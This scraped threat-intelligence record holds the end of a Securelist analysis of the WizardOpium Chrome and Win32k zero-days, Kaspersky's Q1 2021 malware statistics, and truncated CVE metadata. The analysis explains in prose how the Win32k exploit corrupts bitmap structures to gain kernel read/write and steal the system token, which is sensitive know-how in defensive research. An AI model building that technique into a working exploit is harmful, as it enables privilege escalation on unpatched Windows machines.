The whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares a Switch Window and uses the vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as the Switch Window extra data. Bitmaps are represented by a SURFOBJ structure, and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer, and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.

The pvScan0 field of the SURFOBJ structure is the address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl, and to get the offset to the EPROCESS structure the exploit parses the executable in search of the exported PsInitialSystemProcess variable.

It's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post-exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges, the exploit downloads and executes the actual malware.

## Conclusions

It was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows, mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.

_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720.
The reward was donated to charity and Google matched the donation._

_Source: Securelist, "The zero-day exploits of Operation WizardOpium", published 2020-05-28: <https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>_

_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q1 2021:

 * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.
 * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.
 * Ransomware attacks were defeated on the computers of 91,841 unique users.
 * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.

## Financial threats

### Financial threat statistics

At the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021.
In total, Kaspersky solutions blocked such malware on the computers of 118,099 unique users this quarter.

_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_

**Attack geography**

_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._

_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by share of attacked users**

| **Country*** | **%****
---|---|---
1 | Turkmenistan | 6.3
2 | Tajikistan | 5.3
3 | Afghanistan | 4.8
4 | Uzbekistan | 4.6
5 | Paraguay | 3.2
6 | Yemen | 2.1
7 | Costa Rica | 2.0
8 | Sudan | 2.0
9 | Syria | 1.5
10 | Venezuela | 1.4

_* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._

As before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families.
The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.

**Top 10 banking malware families**

| Name | Verdicts | %*
---|---|---|---
1 | Zbot | Trojan.Win32.Zbot | 30.8
2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9
3 | Trickster | Trojan.Win32.Trickster | 7.5
4 | Emotet | Backdoor.Win32.Emotet | 7.4
5 | RTM | Trojan-Banker.Win32.RTM | 6.6
6 | Nimnul | Virus.Win32.Nimnul | 5.1
7 | Nymaim | Trojan.Win32.Nymaim | 4.7
8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8
9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9
10 | Neurevt | Trojan.Win32.Neurevt | 2.2

_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._

## Ransomware programs

### Quarterly trends and highlights

**New additions to the ransomware arsenal**

Last year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.

REvil (aka Sodinokibi) is another group looking to increase its extortion leverage.
In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.

**Attacks on vulnerable Exchange servers**

[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector has been seen in use by the Black Kingdom and DearCry families.

**Publication of keys**

The developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.

**Law enforcement successes**

Law enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.

French and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors.
The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.

In South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).

### Number of new modifications

In Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.

_Number of new ransomware modifications, Q1 2020 – Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_

### Number of users attacked by ransomware Trojans

In Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_

### Attack geography

_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries attacked by ransomware Trojans**

| **Country*** | **%****
---|---|---
1 | Bangladesh | 2.31%
2 | Ethiopia | 0.62%
3 | Greece | 0.49%
4 | Pakistan | 0.49%
5 | China | 0.48%
6 | Tunisia | 0.44%
7 | Afghanistan | 0.42%
8 | Indonesia | 0.38%
9 | Taiwan, Province of China | 0.37%
10 | Egypt | 0.28%

_* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

### Top 10 most common families of ransomware Trojans

| **Name** | **Verdicts** | **%***
---|---|---|---
1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37%
2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01%
3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31%
4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45%
5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36%
6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom, Virus.Win32.PolyRansom | 3.78%
7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93%
8 | Stop | Trojan-Ransom.Win32.Stop | 2.79%
9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17%
10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85%

_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._

## Miners

### Number of new modifications

In Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed relatively calmly, March saw a sharp rise in the number of new modifications — more than fourfold compared to February.

_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_

### Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell.
For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.

_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_

### Attack geography

_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries attacked by miners**

| **Country*** | **%****
---|---|---
1 | Afghanistan | 4.65
2 | Ethiopia | 3.00
3 | Rwanda | 2.37
4 | Uzbekistan | 2.23
5 | Kazakhstan | 1.81
6 | Sri Lanka | 1.78
7 | Ukraine | 1.59
8 | Vietnam | 1.48
9 | Mozambique | 1.46
10 | Tanzania | 1.45

_* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyber attacks

In Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) — use-after-free vulnerabilities in Microsoft Excel — and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities — even the latest of them was discovered almost three years ago.
So, once again, we remind you of the importance of regular updates.

The first quarter was rich not only in known exploits, but also in new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:

 * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) — a server-side request forgery vulnerability that allows remote code execution (RCE)
 * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) — an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server
 * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) — a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution
 * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) — as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system

Found [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.

During the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem.
Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_

The second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there were newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:

 * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>) — heap buffer overflow in the V8 script engine, leading to remote code execution
 * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) — overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution
 * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>) — bypassing security restrictions when using an iframe.

Other interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights.
Critical vulnerabilities in the popular SolarWinds Orion Platform — [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) — caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.

Analysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-forcing passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).

## Attacks on macOS

Q1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS).
In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).

**Top 20 threats for macOS**

| **Verdict** | **%***
---|---|---
1 | AdWare.OSX.Pirrit.ac | 18.01
2 | AdWare.OSX.Pirrit.j | 12.69
3 | AdWare.OSX.Pirrit.o | 8.42
4 | AdWare.OSX.Bnodlero.at | 8.36
5 | Monitor.OSX.HistGrabber.b | 8.06
6 | AdWare.OSX.Pirrit.gen | 7.95
7 | Trojan-Downloader.OSX.Shlayer.a | 7.90
8 | AdWare.OSX.Cimpli.m | 6.17
9 | AdWare.OSX.Pirrit.aa | 6.05
10 | Backdoor.OSX.Agent.z | 5.27
11 | Trojan-Downloader.OSX.Agent.h | 5.09
12 | AdWare.OSX.Bnodlero.bg | 4.60
13 | AdWare.OSX.Ketin.h | 4.02
14 | AdWare.OSX.Bnodlero.bc | 3.87
15 | AdWare.OSX.Bnodlero.t | 3.84
16 | AdWare.OSX.Cimpli.l | 3.75
17 | Trojan-Downloader.OSX.Lador.a | 3.61
18 | AdWare.OSX.Cimpli.k | 3.48
19 | AdWare.OSX.Ketin.m | 2.98
20 | AdWare.OSX.Bnodlero.ay | 2.94

_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

Traditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families.
But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.

### Threat geography

_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by share of attacked users**

| **Country*** | **%****
---|---|---
1 | France | 4.62
2 | Spain | 4.43
3 | Italy | 4.36
4 | India | 4.11
5 | Canada | 3.59
6 | Mexico | 3.55
7 | Russia | 3.21
8 | Brazil | 3.18
9 | Great Britain | 2.96
10 | USA | 2.94

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

In Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.

## IoT attacks

### IoT threat statistics

In Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol.
A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | 
India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 
613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. 
These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. 
Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Use-after-free in WebAudio in Google Chrome allows a remote attacker to potentially exploit heap corruption.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-23T00:00:00", "type": "cisa_kev", "title": "Google Chrome Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": 
"2022-05-23T00:00:00", "id": "CISA-KEV-CVE-2019-13720", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chrome Heap Buffer Overflow in WebAudio Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 